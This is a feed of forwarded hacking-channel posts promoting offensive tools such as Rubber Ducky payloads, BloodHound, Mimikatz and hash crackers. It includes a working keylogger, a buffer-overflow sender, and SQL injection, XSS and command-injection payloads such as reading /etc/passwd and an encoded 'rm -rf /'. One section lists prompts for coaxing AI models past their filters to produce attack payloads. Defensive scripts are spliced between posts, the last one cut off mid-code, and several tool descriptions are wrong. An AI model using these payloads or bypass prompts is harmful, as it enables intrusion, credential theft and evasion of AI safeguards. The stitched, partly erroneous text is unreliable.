Forwarded from Exploiting Crew (Pr1vAt3)
🦑 USB Rubber Ducky Payload
The [USB Rubber Ducky Payload Repository](https://github.com/hak5/usbrubberducky-payloads) by Hak5 provides a collection of ready-to-use payloads for the USB Rubber Ducky—a keystroke injection tool often used for penetration testing and red teaming. These payloads simulate fast and stealthy input for various exploits and tasks.
---
### GitHub Repository:
[Hak5 USB Rubber Ducky Payloads](https://github.com/hak5/usbrubberducky-payloads)
---
### Example Payload Structure:
#### Payload Documentation
All payloads start with comments that describe their purpose, author, target, and configuration.
```
REM Title: Example Payload
REM Author: Korben Dallas
REM Description: Opens hidden PowerShell
REM Target: Windows 10
REM Props: Hak5, Darren Kitchen
REM Version: 1.0
REM Category: General
```
---
#### Payload Example: URL Opening Script
This payload opens a URL after a brief delay.
```
REM BEGINNING OF PAYLOAD
REM CONFIGURATION
REM REQUIRED - Provide URL
DEFINE #MY_TARGET_URL example.com
REM OPTIONAL - Set boot delay; default is 5 seconds
DEFINE #BOOT_DELAY 5000
DELAY #BOOT_DELAY
STRING start chrome.exe #MY_TARGET_URL
ENTER
```
---
### Features:
1. Preconfigured Payloads:
- Password exfiltration
- Reverse shells
- Network reconnaissance
- Drive-by downloads
2. Customizable Payloads:
- DEFINE statements for reusable parameters.
- DELAY statements to time operations precisely.
3. Cross-Platform Targeting:
- Payloads can be customized for Windows, macOS, and Linux.
---
### Key Payload Categories:
1. Information Gathering:
- Automated reconnaissance.
- Exporting network details.
2. Exploitation:
- Privilege escalation.
- Exploiting vulnerabilities via automated commands.
3. Post-Exploitation:
- Extracting data or installing backdoors.
4. Social Engineering:
- Simulating user activity or spoofing actions.
---
### Notable Use Case:
#### Hidden PowerShell Script Execution
```
REM Title: Hidden PowerShell Execution
REM Author: Hak5
REM Description: Launches a hidden PowerShell instance.
REM Target: Windows 10
REM Category: Post-Exploitation
DELAY 5000
STRING powershell -windowstyle hidden
ENTER
```
---
### Usage:
1. Select a payload from the repository.
2. Edit the payload as per your target's configuration.
3. Load the payload onto the USB Rubber Ducky.
4. Deploy and execute the payload by plugging it into the target system.
This repository is a must-have for penetration testers aiming to automate tasks, test security defenses, or explore advanced attack vectors. Ensure proper authorization when using these tools.
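For the reviewer's side of the payload structure described above, a static triage of a recovered payload file, as an added example that is not part of the original post or of the Hak5 repository: it reads the REM header, resolves DEFINE constants, and lists what the device would type. The function name `triage` and the `SUSPICIOUS` token list are assumptions made for this sketch; the sample is constructed from the two fragments shown in this post.

```python
import re

# Constructed sample: the two payload fragments shown in this post, joined.
SAMPLE = """\
REM Title: Hidden PowerShell Execution
REM Author: Hak5
REM Description: Launches a hidden PowerShell instance.
REM Target: Windows 10
REM Category: Post-Exploitation
DEFINE #MY_TARGET_URL example.com
DEFINE #BOOT_DELAY 5000
DELAY #BOOT_DELAY
STRING start chrome.exe #MY_TARGET_URL
ENTER
DELAY 5000
STRING powershell -windowstyle hidden
ENTER
"""

# Assumption: a short, illustrative list of typed tokens worth a reviewer's attention.
SUSPICIOUS = ("-windowstyle hidden", "-enc", "powershell", "cmd /c", "curl ", "wget ")

# Header comments have the form "REM Key: value"; free-text REM lines do not match.
HEADER_RE = re.compile(r"^REM\s+(\w+):\s*(.*)$")


def triage(text):
    """Return header metadata, resolved typed strings, total delay and findings."""
    meta, defines, typed, findings = {}, {}, [], []
    total_delay_ms = 0

    def resolve(s):
        # Substitute longest names first so #A does not clobber #AB.
        for name in sorted(defines, key=len, reverse=True):
            s = s.replace(name, defines[name])
        return s

    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line:
            continue
        cmd, _, arg = line.partition(" ")
        if cmd == "REM":
            m = HEADER_RE.match(line)
            if m:
                meta[m.group(1).lower()] = m.group(2)
        elif cmd == "DEFINE":
            name, _, value = arg.partition(" ")
            defines[name] = value
        elif cmd == "DELAY":
            value = resolve(arg)
            if value.isdigit():
                total_delay_ms += int(value)
            else:
                findings.append((lineno, f"unresolved DELAY value {arg!r}"))
        elif cmd in ("STRING", "STRINGLN"):
            s = resolve(arg)
            typed.append(s)
            low = s.lower()
            for tok in SUSPICIOUS:
                if tok in low:
                    findings.append((lineno, f"types {tok.strip()!r}"))
    return {"meta": meta, "typed": typed,
            "delay_ms": total_delay_ms, "findings": findings}


if __name__ == "__main__":
    report = triage(SAMPLE)
    print(report["meta"].get("title"), "|", report["delay_ms"], "ms of delay")
    for s in report["typed"]:
        print("  types:", s)
    for lineno, msg in report["findings"]:
        print(f"  line {lineno}: {msg}")
```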
Forwarded from Exploiting Crew (Pr1vAt3)
🦑Game changer. Microsoft open-sourced bitnet.cpp, you can now run 100B LLMs locally without a GPU needed.
The framework quantizes LLMs to 1-bit precision and runs inference directly on CPUs, making large language models accessible on standard hardware.
Technical details:
▸ Forked from llama.cpp with optimizations for 1-bit inference
▸ Handles models up to 100B parameters locally
▸ Achieves 6.17x speedup compared to standard inference
▸ Reduces energy consumption by 82.2%
▸ Works on standard CPUs without specialized hardware
Repo: https://lnkd.in/guEhH8ad
↓
Are you an AI developer? Check out https://AlphaSignal.ai to get a daily summary of breakthrough models, repos and papers in AI. Read by 200,000+ devs.
Forwarded from Exploiting Crew (Pr1vAt3)
🦑Monitoring: BloodHound is a powerful tool for analyzing and visualizing Active Directory environments. It assists penetration testers and system administrators in identifying weak permissions, potential attack paths, and privilege escalation opportunities within a Windows domain.
---
### GitHub Repository:
[BloodHound GitHub](https://github.com/BloodHoundAD/BloodHound)
---
### Features:
1. Active Directory Enumeration:
- Maps domain trust relationships.
- Identifies paths to high-value targets like Domain Admins.
- Highlights risky ACLs and misconfigurations.
2. Graph Visualization:
- Displays a clear graph of domain objects and their relationships.
- Uses queries to highlight exploitable paths and vulnerabilities.
3. Neo4j Database Integration:
- Stores collected AD data for analysis.
- Allows querying via Cypher language for complex insights.
4. Cross-Platform Support:
- Runs on Windows, macOS, and Linux.
---
### Use Cases:
1. Privilege Escalation:
- Identifies attack paths from low-privileged users to domain administrators.
2. Lateral Movement:
- Maps routes through machines, groups, and users for lateral traversal.
3. Audit & Mitigation:
- Assists administrators in identifying weak spots and tightening security.
---
### How It Works:
1. Data Collection:
Use SharpHound, the data collector, to gather information from the domain.
Example:
```
SharpHound.exe -c All
```
This collects data about users, groups, permissions, trusts, and ACLs.
2. Data Import:
Import the collected JSON files into BloodHound.
3. Querying:
Use predefined or custom Cypher queries to identify attack paths.
Example Query:
```cypher
MATCH (n:User {name:"John"})-[r:AdminTo]->(m:Computer) RETURN n,m
```
This finds all computers where "John" has administrative rights.
---
### Visualization Example:
A graphical representation might show:
- Nodes: Users, groups, computers, and domains.
- Edges: Relationships like group memberships, session hosts, and admin rights.
---
### Installation:
1. Neo4j Database:
- Download and install from [Neo4j](https://neo4j.com/).
- Start the database service.
2. BloodHound:
- Clone the repository or download the release binaries.
- Run the BloodHound GUI.
---
### Additional Tools:
- SharpHound: Data collection tool for Windows environments.
- AzureHound: Gathers data for Azure AD.
This tool is essential for auditing AD security and simulating attacker behavior in penetration testing engagements.
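The same graph model from the auditor's side, as an added example that is not part of the original post or of BloodHound: it finds a shortest path from a low-privileged user to Domain Admins over a constructed edge list, then reports which single edges break every path when removed. Node names and edges are constructed; the relationship labels follow the types named above (group membership as MemberOf, admin rights as AdminTo, session hosts as HasSession).

```python
from collections import deque

# Constructed sample graph: (source, relationship, target).
EDGES = [
    ("JOHN", "MemberOf", "HELPDESK"),
    ("HELPDESK", "AdminTo", "WS01"),
    ("WS01", "HasSession", "SVC_BACKUP"),
    ("SVC_BACKUP", "AdminTo", "SRV01"),
    ("JOHN", "AdminTo", "WS02"),
    ("WS02", "HasSession", "SVC_BACKUP"),
    ("SRV01", "HasSession", "ALICE_DA"),
    ("ALICE_DA", "MemberOf", "DOMAIN ADMINS"),
]


def shortest_path(edges, start, goal):
    """Breadth-first search; returns the edges on a shortest path, or None."""
    adj = {}
    for e in edges:
        adj.setdefault(e[0], []).append(e)
    prev = {start: None}          # node -> edge used to reach it
    queue = deque([start])
    while queue:
        node = queue.popleft()
        if node == goal:
            path = []
            while prev[node] is not None:
                path.append(prev[node])
                node = prev[node][0]
            return path[::-1]
        for e in adj.get(node, []):
            if e[2] not in prev:
                prev[e[2]] = e
                queue.append(e[2])
    return None


def choke_points(edges, start, goal):
    """Edges whose individual removal leaves no path from start to goal."""
    path = shortest_path(edges, start, goal)
    if path is None:
        return []
    # An edge present on every path is present on this one, so test only these.
    return [e for e in path
            if shortest_path([x for x in edges if x != e], start, goal) is None]


if __name__ == "__main__":
    for src, rel, dst in shortest_path(EDGES, "JOHN", "DOMAIN ADMINS"):
        print(f"{src} -[{rel}]-> {dst}")
    print("remediation candidates:")
    for src, rel, dst in choke_points(EDGES, "JOHN", "DOMAIN ADMINS"):
        print(f"  {src} -[{rel}]-> {dst}")
```

In this sample the two workstation routes are redundant, so removing either one changes nothing; the edges that end the exposure are the service account's admin right on the server and the administrator's session there.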
Forwarded from Exploiting Crew (Pr1vAt3)
🦑 all-in-one toolkit Scanners-Box
Description: Scanners-Box is an all-in-one toolkit that consolidates various scanning utilities for penetration testers, security analysts, and system administrators. It helps with network reconnaissance, vulnerability assessment, and information gathering. The framework simplifies the management and execution of multiple scanning tools in a unified environment.
---
### GitHub Repository:
[Scanners-Box GitHub](https://github.com/We5ter/Scanners-Box)
---
### Features:
1. Comprehensive Scanning Tools:
- Includes tools for port scanning, vulnerability assessment, subdomain enumeration, and more.
- Aggregates commonly used scanners like Nmap, Nikto, and masscan.
2. Modular Design:
- Flexible configuration allows adding custom tools and scripts.
- Easily integrates new scanning functionalities.
3. Automation:
- Automates repetitive scanning tasks.
- Batch scanning capabilities for multiple targets.
4. Cross-Platform Support:
- Works on Windows, Linux, and macOS systems.
5. Custom Scripts:
- Leverages Python and bash scripts for tailored tasks.
---
### Use Cases:
1. Port and Service Scanning:
- Quickly identify open ports and running services on target systems.
2. Subdomain Enumeration:
- Gather subdomains and perform DNS resolution checks.
3. Web Server Vulnerability Scanning:
- Analyze web servers for known vulnerabilities using integrated tools like Nikto.
4. Network Reconnaissance:
- Map out networks and identify potential entry points for further exploitation.
5. Vulnerability Assessment:
- Assess the security posture of networks and web applications.
---
### Key Tools Included:
1. Port Scanners:
- Nmap
- masscan
- unicornscan
2. Vulnerability Scanners:
- Nikto
- OpenVAS
- wapiti
3. Web Application Scanners:
- w3af
- Arachni
- Burp Suite integration
4. Subdomain Enumeration:
- Sublist3r
- Amass
- assetfinder
5. DNS and OSINT:
- dnsenum
- theHarvester
---
### Installation:
1. Clone the repository:
```
git clone https://github.com/We5ter/Scanners-Box.git
```
2. Navigate to the directory:
```
cd Scanners-Box
```
3. Run the setup script:
```
bash install.sh
```
---
### Example Usage:
- Subdomain Scanning:
```
python3 subdomain.py --target example.com
```
- Port Scanning with Nmap:
```
python3 nmap_scan.py --target 192.168.1.1
```
- Vulnerability Scanning:
```
python3 nikto_scan.py --target example.com
```
---
### Advantages:
- Consolidates multiple tools in one framework.
- Reduces setup time for scanning tasks.
- Easily customizable and extendable.
This toolkit is invaluable for quickly setting up comprehensive scans in penetration testing and vulnerability assessment workflows.
Automated Collection of Vulnerabilities and Their Fixes from Open-Source Software
https://github.com/secureIT-project/CVEfixes
Forwarded from Exploiting Crew (Pr1vAt3)
🦑 Creating AI based Malware
Creating and Solving Challenges with AI Safeguards
Before proceeding, it's crucial to highlight that creating malware, participating in malicious activities, or circumventing ethical guidelines is against responsible and lawful use of technology.
### Step-by-Step Approach to Solve AI-based s
#### 1. Understand the Challenge Context:
- Category: Identify if it's reverse engineering, binary exploitation, web exploitation, cryptography, or malware analysis.
- Analyze the Objective: Read the challenge carefully to determine what needs to be achieved (e.g., decode, extract, or manipulate).
#### 2. Leverage AI for Analysis:
Use AI-based tools to analyze or automate repetitive tasks:
- Binary Analysis: Use frameworks like Ghidra or Radare2 for reverse engineering.
- Automate Patterns: Leverage Python with AI libraries like OpenAI or TensorFlow for pattern recognition or automated testing.
#### 3. Code Malware-like Behavior (Legally for Educational Purposes):
When solving a , you may encounter situations mimicking malware functionality:
- Payload Analysis: Decrypt encoded payloads using tools like CyberChef.
- Code Automation:
- Example: Create a keylogger (for analysis, NOT deployment):
```python
from pynput import keyboard

def on_press(key):
    try:
        print(f"Key {key.char} pressed")
    except AttributeError:
        print(f"Special key {key} pressed")

with keyboard.Listener(on_press=on_press) as listener:
    listener.join()
```
#### 4. Exploit Development:
- Use tools like Metasploit or custom scripts to simulate the exploitation phase.
- Example of a buffer overflow simulation (basic concept):
```python
import socket

target_ip = "127.0.0.1"
target_port = 9999
payload = b"A" * 1024  # Overflow buffer size

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((target_ip, target_port))
s.send(payload)
s.close()
```
#### 5. AI-assisted Malware Analysis:
- Dynamic Analysis: Use sandboxing tools like Cuckoo Sandbox to observe malware behavior in a controlled environment.
- Static Analysis: Utilize AI models to classify potential threats from a binary.
#### 6. Reverse Engineer the Challenge:
- Use tools like IDA Pro or Binary Ninja to decompile and analyze binaries.
- Example: Identifying a hardcoded key in a binary:
- Use Ghidra to navigate to the main function and identify key variables.
#### 7. Test with Custom AI Scripts:
Automate solving repetitive tasks:
- Password Cracking:
- Use AI to brute force or pattern match probable passwords.
- Example: Use hashcat for password recovery.
- Web Exploitation:
- Automate SQL injection:
```python
import requests

target_url = "http://example.com/login"
payload = {"username": "' OR 1=1 --", "password": ""}
response = requests.post(target_url, data=payload)
print(response.text)
```
#### 8. Validate and Optimize:
- Use AI tools to simulate attack scenarios and validate success.
- Example: Use machine learning models for detecting evasion in traffic.
---
### Recommendations and Guidelines:
- Focus on solving s ethically and using skills for legitimate purposes like penetration testing or cybersecurity research.
- Follow rules to ensure fair play and improve your knowledge responsibly.
- Leverage tools like AI models for accelerating repetitive tasks, but always align their use with ethical guidelines.
If you’re facing specific challenges in a , feel free to describe them, and I'll help guide you through solving them!
🦑 Example AI Filter Bypass
Ai gives us prompts to bypass his filters🫠
Crafting prompts or solutions to bypass ethical filters in a scenario requires careful handling to ensure compliance with ethical guidelines, lawful practices, and the intended educational purposes of the challenge. Here's how to approach solving s using AI responsibly:
---
### 1. Understand the Challenge
- Identify Filters: What type of filter or protection is in place? (e.g., WAF, input validation, rate limits).
- Analyze the Scope: Are you working with web input, network traffic, or system-level constraints?
---
### 2. AI-Assisted Prompts for Analysis
Leverage AI tools like ChatGPT, GPT-4, or custom LLMs to assist in analyzing and solving . Below are ethical and focused prompts:
#### Input Validation or WAF Bypass
- Prompt:
- *"Generate a list of obfuscated SQL payloads to test input validation mechanisms, ensuring they align with ethical penetration testing practices."*
- *"How can I encode payloads to bypass basic web filters while remaining within educational use?"*
#### Payload Generation for Testing
- Prompt:
- *"What are effective URL-encoding methods to test a web application's XSS filter?"*
- *"Explain how base64 encoding can be applied to payloads for safe testing of filters in s."*
#### Analyzing Network or Application Behavior
- Prompt:
- *"Suggest methods to analyze rate-limiting strategies in a web application during a ."*
- *"What are common header manipulations that can help test a web firewall in a controlled environment?"*
---
### 3. Practical AI-Assisted Payload Creation
Below are some examples of payloads and bypass techniques for testing in s, ensuring lawful use:
#### SQL Injection (Obfuscated Inputs)
- AI-generated prompt:
*"Craft an SQL injection payload that uses hex encoding or alternative comment syntax to bypass basic filters."*
- Example:
```
' OR 1=1;--
```
#### XSS (Input Sanitization Bypass)
- AI-generated prompt:
*"Provide an XSS payload that utilizes uncommon attributes or event handlers to bypass sanitization filters."*
- Example:
```
<img src="x" onerror="alert('')">
```
#### Command Injection (Encoding Payloads)
- AI-generated prompt:
*"Explain how to encode command injection payloads to evade simple validation mechanisms."*
- Example:
```
; ls -la;
```
---
### 4. AI-Assisted Automation
#### Testing HTTP Parameters
- Prompt:
*"Generate Python code for fuzzing HTTP parameters using a predefined payload list in a environment."*
- Code:
```python
import requests

target_url = "http://example.com/vulnerable-endpoint"
payloads = ["' OR 1=1 --", "<script>alert(1)</script>", "&& cat /etc/passwd"]

for payload in payloads:
    response = requests.get(target_url, params={"input": payload})
    print(f"Payload: {payload}, Response: {response.status_code}")
```
#### AI-Based Encoding
- Prompt:
*"Explain how to encode attack payloads using techniques like URL encoding or base64 to test input filters."*
- Code Example:
```python
import base64

payload = "rm -rf /"
encoded_payload = base64.b64encode(payload.encode()).decode()
print(f"Encoded Payload: {encoded_payload}")
```
---
### 5. Top AI Prompts for Problem-Solving in s
Here are adaptable prompts for specific challenges:
1. Input Validation Bypass:
*"What are common bypass techniques for input validation using encoding, transformations, or special characters?"*
2. Filter Detection:
*"How can I use timing analysis to detect the presence of a web application firewall in a setting?"*
3. Automation Strategies:
*"Provide a Python script for automating brute-force testing of input fields while respecting ethical boundaries."*
4. Reverse Engineering Assistance:
*"Explain how to identify hardcoded secrets in a binary file using reverse engineering tools."*
5. Advanced Obfuscation:
*"What are creative ways to obfuscate payloads for educational while maintaining execution?"*
---
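Why the injection strings shown above depend on how the application builds its query or page rather than on the filter in front of it, as an added example that is not part of the original post: the same inputs are run against a weak handler and a hardened one. The table, its single row and all function names are constructed for illustration.

```python
import html
import sqlite3


def make_db():
    """In-memory database with one constructed account."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (username TEXT, password TEXT)")
    db.execute("INSERT INTO users VALUES ('alice', 's3cret')")
    return db


def login_concat(db, username, password):
    # Weak form: user input becomes part of the SQL text, so quotes and
    # comment markers in the input change the meaning of the statement.
    q = ("SELECT count(*) FROM users WHERE username = '" + username +
         "' AND password = '" + password + "'")
    return db.execute(q).fetchone()[0] > 0


def login_param(db, username, password):
    # Hardened form: input is bound as data and is never parsed as SQL,
    # whatever encoding or comment syntax it carries.
    q = "SELECT count(*) FROM users WHERE username = ? AND password = ?"
    return db.execute(q, (username, password)).fetchone()[0] > 0


def render_comment(text):
    # Output encoding for an HTML body context: markup characters in the
    # input are emitted as entities, so no element or handler is created.
    return "<p>" + html.escape(text) + "</p>"


if __name__ == "__main__":
    db = make_db()
    sqli = "' OR 1=1 --"
    print("concatenated query accepts:", login_concat(db, sqli, ""))
    print("parameterized query accepts:", login_param(db, sqli, ""))
    print(render_comment('<img src="x" onerror="alert(\'\')">'))
```

With parameter binding and context-aware output encoding in place, an input filter or WAF is a second layer rather than the control the application relies on.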
Forwarded from Exploiting Crew (Pr1vAt3)
🦑 Setup a 2024 Drupal vulnerability:
After installing the Drupal application, the developer can change the hash_salt variable on line 268 of the /sites/default/settings.php file. As advised in the example, the developer can use a file for this by using the file_get_contents function:
Forwarded from Exploiting Crew (Pr1vAt3)
If this is set to a file with a salt string in it, the application works as intended. However, if this is set to an empty file or a file that doesn't exist, for example because the file it was set to gets deleted, removed or renamed after some time, this will break the website. As an example, the following code can be used, as recommended in the image:
Forwarded from Exploiting Crew (Pr1vAt3)
🦑xx Deep Fake Videos Notes :
---
How Deepfakes Are Created:
#### 1. Understanding Deepfakes
Deepfakes are AI-generated videos or images where someone's face or voice is swapped or synthesized using machine learning techniques. They are often made with deep learning algorithms, particularly Generative Adversarial Networks (GANs) or autoencoders.
---
#### 2. Tools and Technologies Used
Creating deepfakes involves the following tools:
- DeepFaceLab: The most popular open-source tool for creating deepfake videos.
- FaceSwap: Another open-source tool with a user-friendly interface.
- First-Order Motion Model: Generates animations using reference images and motion vectors.
- DeepFakeGenerator: Often used for quick results with less control over quality.
---
#### 3. The Process
1. Collect Data:
- Gather high-quality video/images of the target (person to fake).
- More data = better quality. Include various angles and expressions.
2. Preprocessing:
- Detect and extract the face from all frames using facial recognition tools.
- Tools like dlib, MTCNN, or OpenCV can help with this.
- Align and normalize the faces to make them consistent.
3. Train the Model:
- Use an autoencoder or GAN-based model to train on the extracted faces.
- The model learns to replicate and map the source face onto the target face.
- Training can take days or weeks, depending on hardware and dataset size.
4. Face Swapping:
- Once trained, the model generates fake frames with the source face mapped onto the target video.
5. Postprocessing:
- Use video editing tools to blend the fake face seamlessly with the target.
- Adjust lighting, shadows, and other effects for realism.
6. Generate the Final Output:
- Combine the processed frames back into a video.
---
#### 4. Ethical Considerations
The challenge might also require discussing:
- The risks of misuse, such as in disinformation or explicit content.
- Legal and ethical implications.
- Techniques to detect and prevent deepfakes (e.g., AI-based detection algorithms).
---
#### Sample Code for Basics
Here's a simplified Python example using OpenCV to detect and align faces:
```python
import cv2

# Load pre-trained face detection model
face_cascade = cv2.CascadeClassifier(cv2.data.haarcascades + 'haarcascade_frontalface_default.xml')

# Read the image (cv2.imread returns None if the file cannot be read)
image = cv2.imread('source_image.jpg')
if image is None:
    raise FileNotFoundError('source_image.jpg could not be read')
gray = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)

# Detect faces
faces = face_cascade.detectMultiScale(gray, scaleFactor=1.1, minNeighbors=5)

# Draw rectangles around faces
for (x, y, w, h) in faces:
    cv2.rectangle(image, (x, y), (x + w, y + h), (255, 0, 0), 2)

cv2.imshow('Detected Faces', image)
cv2.waitKey(0)
cv2.destroyAllWindows()
```
---
### Key Points to Include
- Explain how GANs or autoencoders are essential for deepfake creation.
- Provide examples of tools like DeepFaceLab or code snippets (if allowed).
- Address ethical challenges.
This guide is for educational purposes only.🙂
🦑Cryptographic operations:
---
### 1. [libsodium](https://github.com/jedisct1/libsodium)
- Description: A modern, easy-to-use crypto library designed for security and performance.
- Features:
- Symmetric encryption (secretbox)
- Public-key encryption (box)
- Key derivation, signing, hashing, and random number generation
- Use Case: General-purpose cryptographic operations.
---
### 2. [age](https://github.com/FiloSottile/age)
- Description: A simple, modern, and secure encryption tool.
- Features:
- Designed for encrypting files with minimal configuration.
- Supports passphrases and SSH keys for decryption.
- Use Case: File encryption and secure file sharing.
---
### 3. [PyCryptodome](https://github.com/Legrandin/pycryptodome)
- Description: A self-contained Python package for cryptography.
- Features:
- Symmetric ciphers (AES, ChaCha20, etc.)
- Public-key algorithms (RSA, DSA, ECC)
- Cryptographic hashes (SHA, MD5)
- Use Case: Building encryption into Python applications.
---
### 4. [OpenSSL](https://github.com/openssl/openssl)
- Description: A robust toolkit for SSL/TLS protocols and general-purpose cryptography.
- Features:
- Encryption/decryption using symmetric and asymmetric algorithms.
- SSL/TLS implementation.
- Extensive support for various cipher suites.
- Use Case: Secure communication and application-level encryption.
---
### 5. [Tink](https://github.com/google/tink)
- Description: A multi-language, cross-platform library for cryptographic operations by Google.
- Features:
- Simplified APIs for common cryptographic use cases.
- High-level encryption, decryption, and key management.
- Use Case: Easy-to-use cryptographic operations for developers.
---
### 6. [VeraCrypt](https://github.com/veracrypt/VeraCrypt)
- Description: Disk encryption software based on TrueCrypt.
- Features:
- Full-disk encryption with advanced security features.
- Support for hidden volumes.
- Use Case: Secure storage of sensitive data.
---
### 7. [cryptography](https://github.com/pyca/cryptography)
- Description: A Python library that provides cryptographic recipes and primitives.
- Features:
- Symmetric and asymmetric encryption.
- X.509 certificate parsing.
- Secure random number generation.
- Use Case: Secure data transmission and application-layer encryption in Python.
---
### 8. [GPG](https://github.com/gpg/gnupg)
- Description: The GNU Privacy Guard, an implementation of OpenPGP.
- Features:
- Encrypt and sign data and communications.
- Key management and public key encryption.
- Use Case: Encrypting emails and files securely.
---
### 9. [rnp](https://github.com/rnpgp/rnp)
- Description: OpenPGP library and CLI tool compatible with GPG.
- Features:
- Encrypting, decrypting, signing, and verifying messages.
- Key generation and management.
- Use Case: OpenPGP encryption in modern applications.
---
### 10. [NaCl (Networking and Cryptography Library)](https://github.com/libsodium/libsodium)
- Description: A low-level cryptography library offering high-performance cryptographic primitives.
- Features:
- Public-key, secret-key, and hash-based cryptographic operations.
- Focus on simplicity and security.
- Use Case: Performance-focused cryptographic solutions.
---
### 11. [CryFS](https://github.com/cryfs/cryfs)
- Description: Cryptographic filesystem for securing cloud storage.
- Features:
- Transparent file encryption.
- Data integrity verification.
- Use Case: Encrypting files in cloud storage services like Dropbox or Google Drive.
---
### 12. [sops](https://github.com/mozilla/sops)
- Description: A tool for managing secrets with encryption.
- Features:
- Encrypts files using AWS KMS, GCP KMS, Azure Key Vault, or PGP.
- Supports YAML, JSON, ENV, and INI files.
- Use Case: Secure storage of configuration files and secrets.
YouTube
Hacking Any Windows Machine With IPv6 Vulnerability (CVE 2024-38063)(Ethical Hacking)
Welcome back! In today's video we are going to discuss recent IPv6 vulnerability that targets almost all windows devices (Windows 11, Windows 10, Windows Server 2008-2022). We will take a look at the published article explaining how the vulnerability works…
🦑Top Decryption Tools 2024-2025:
---
1. [CyberChef](https://github.com/gchq/CyberChef)
- Description: A web-based "Cyber Swiss Army Knife" for encryption, decryption, and data manipulation.
- Features:
- Decrypts data encoded with base64, XOR, AES, etc.
- Includes hash crackers and forensic analysis tools.
- Use Case: Universal tool for decryption and data transformation.
---
2. [John the Ripper](https://github.com/openwall/john)
- Description: A password cracker supporting numerous encryption formats.
- Features:
- Cracks hashed passwords using brute force and dictionary attacks.
- Supports MD5, SHA, DES, Blowfish, and more.
- Use Case: Decrypting password hashes for security assessments.
---
3. [hashcat](https://github.com/hashcat/hashcat)
- Description: An advanced GPU-based password recovery tool.
- Features:
- Supports over 300 hash and encryption algorithms.
- Custom rule sets for password recovery.
- Use Case: Decrypting and recovering encrypted passwords.
---
4. [Ciphey](https://github.com/Ciphey/Ciphey)
- Description: Automated decryption tool that uses AI and natural language processing.
- Features:
- Detects encryption methods automatically.
- Decodes ciphertext into human-readable text.
- Use Case: Quick decryption of unknown encrypted data.
---
5. [GPG (GNU Privacy Guard)](https://github.com/gpg/gnupg)
- Description: Decrypts data encrypted with the OpenPGP standard.
- Features:
- Decrypts and verifies encrypted emails, files, and data.
- Key management and multi-platform compatibility.
- Use Case: Decrypting communications and files in OpenPGP format.
---
6. [OpenSSL](https://github.com/openssl/openssl)
- Description: A toolkit for SSL/TLS protocols with decryption capabilities.
- Features:
- Decrypts SSL/TLS traffic (with private keys).
- Decrypts data encrypted with OpenSSL algorithms.
- Use Case: Secure communication decryption and data recovery.
---
7. [decrypt-wpa](https://github.com/mcgrew/decrypt-wpa)
- Description: Tool for decrypting WPA traffic with a known PSK (pre-shared key).
- Features:
- Supports WPA2 capture decryption using Wireshark-compatible files.
- Packet-by-packet decryption.
- Use Case: Analyzing and decrypting WPA-encrypted network traffic.
---
8. [CrackStation](https://github.com/CrackStation/crackstation-wordlist)
- Description: A massive password decryption tool using precomputed hash dictionaries.
- Features:
- Decrypts MD5, SHA-1, and other hash formats.
- Includes a comprehensive wordlist for hash matching.
- Use Case: Hash decryption and penetration testing.
---
9. [bcrypt-tool](https://github.com/rg3/bcrypt-tool)
- Description: A command-line utility to decrypt bcrypt-encrypted passwords.
- Features:
- Uses brute-force and dictionary attacks for bcrypt hashes.
- High-performance decryption with GPU support.
- Use Case: Decrypting bcrypt-protected passwords.
---
10. [Mimikatz](https://github.com/gentilkiwi/mimikatz)
- Description: A popular tool for extracting plaintext passwords and keys from memory.
- Features:
- Decrypts Windows credentials from memory (LSASS process).
- Extracts Kerberos tickets and NTLM hashes.
- Use Case: Forensic and penetration testing to decrypt sensitive credentials.
---
11. [Hash-Identifier](https://github.com/blackploit/hash-identifier)
- Description: Identifies the type of hash and prepares for decryption.
- Features:
- Recognizes over 200 hash types.
- Prepares data for tools like John the Ripper or hashcat.
- Use Case: Pre-decryption hash identification.
---
12. [AES Crypt](https://github.com/paulej/AESCrypt)
- Description: A file encryption and decryption tool using AES-256.
- Features:
- Command-line interface for secure decryption.
- Cross-platform compatibility.
- Use Case: Secure file decryption for personal and business use.
---
🦑 Dark Web Online sites List:
🦑Ethereum Hacking:
Mythril for Smart Contracts (Ethereum)
If you want to explore Mythril's use cases (Ethereum-focused):
1. Install Mythril:
```bash
pip install mythril
```
2. Run Mythril to analyze a smart contract:
```bash
myth analyze contract.sol
```
3. Detect vulnerabilities in bytecode:
```bash
myth analyze --rpc http://127.0.0.1:8545 -a <CONTRACT_ADDRESS>
```
---
### Commands for Bitcoin Pentesting
Bitcoin pentesting would rely on tools and methods such as analyzing P2SH scripts, transaction structures, and wallet vulnerabilities. Below are specific actionable commands/tools:
#### 1. Bitcoin Script Analysis
Use `bitcoin-cli` to decode and analyze scripts:
```bash
bitcoin-cli decodescript <HEX_SCRIPT>
```
#### 2. Transaction Vulnerability Analysis
Decode raw transactions:
```bash
bitcoin-cli decoderawtransaction <RAW_TX>
```
#### 3. Wallet Testing
Test wallets using libraries like `btcpy`:
```python
from btcpy.structs.transaction import Transaction
tx = Transaction.deserialize(<RAW_TX>)
print(tx)
```
#### 4. Cross-Site Blockchain Vulnerabilities
Automate REST API pentesting for wallets or blockchain explorers:
```bash
sqlmap -u "http://blockchainexplorer.com/api?query=*" --dbs
```
#### 5. Custom Scripts for Exploits
Create Bitcoin raw transactions with custom scripts:
```bash
bitcoin-cli createrawtransaction '[{"txid":"<TXID>","vout":<INDEX>}]' '{"<ADDRESS>":<AMOUNT>}'
```
---
### Mythril-like Analysis for Bitcoin Alternatives
1. Analyze multisig transactions for bugs:
```bash
bitcoin-cli validateaddress <ADDRESS>
```
2. Debug SegWit scripts:
```bash
bitcoin-cli decodescript <HEX_SCRIPT>
```
3. Use btcd or other libraries to craft transactions:
```bash
go run btcd_tx_tool.go
```
This post is made for educational purposes
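What `bitcoin-cli decoderawtransaction` reads out of the hex, as an added example that is not part of the original post: a standard-library Python parser for the raw transaction wire format (legacy and SegWit) that labels common output script templates such as P2SH. The function names and the sample transaction are constructed for illustration and do not refer to a real transaction.

```python
"""Minimal raw Bitcoin transaction parser (added example, standard library only)."""
from io import BytesIO


def take(stream, n):
    """Read exactly n bytes or fail; truncated input must not parse silently."""
    data = stream.read(n)
    if len(data) != n:
        raise ValueError(f"truncated transaction: wanted {n} bytes, got {len(data)}")
    return data


def read_u(stream, n):
    """Little-endian unsigned integer of n bytes."""
    return int.from_bytes(take(stream, n), "little")


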